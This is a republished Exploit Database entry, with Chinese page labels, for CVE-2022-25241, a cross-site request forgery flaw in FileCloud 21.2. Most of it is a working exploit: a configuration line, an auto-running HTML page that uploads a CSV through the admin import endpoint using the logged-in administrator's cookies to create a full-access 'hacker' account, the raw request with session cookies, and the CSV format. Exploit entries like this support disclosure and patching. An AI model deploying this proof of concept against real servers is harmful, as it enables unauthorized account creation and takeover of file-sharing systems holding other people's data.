FileCloud 21.2 – Cross-Site Request Forgery (CSRF)

• Exploit Database
• 16 阅读

• 作者： Masashi Fujiwara
  日期： 2022-02-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50774/

• # Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
  # Date: 2022-02-20
  # Exploit Author: Masashi Fujiwara
  # Vendor Homepage: https://www.filecloud.com/
  # Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2
  # Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447)
  # Tested on:
  #OS: Ubuntu 18.04.6 LTS (Docker)
  #Apache: 2.4.52
  #FileCloud: 21.2.4.17315
  # CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)
  
  # Conditions
  1. Only vulnerable if cookies have samesite set to None (SameSite=None).
   echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php
  2. Use https as target url (When cookies set SameSite=None, also set Secure).
  
  # PoC (HTML)
  <html>
  <head>
  <meta http-equiv="Pragma" content="no-cache">
  <meta http-equiv="Cache-Control" content="no-cache">
  
  <script>
  function init(){
  myFormData = new FormData();
  let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});
  myFormData.append("uploadFormElement", fileContent, "user.csv");
  fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});
  }
  </script>
  </head>
  <body onload="init()">
  CSRF PoC for CVE-2022-25241
  
  Creat hacker user with Password1 via CSV file upload.
  </body>
  </html>
  
  
  
  # HTTPS Request
  POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1
  Host: 192.168.159.129:8443
  Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493
  Content-Length: 365
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW
  Connection: close
  
  ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW
  Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"
  Content-Type: application/vnd.ms-excel
  
  UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
  hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
  
  ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--
  
  
  
  # CSV file format
  UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
  hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES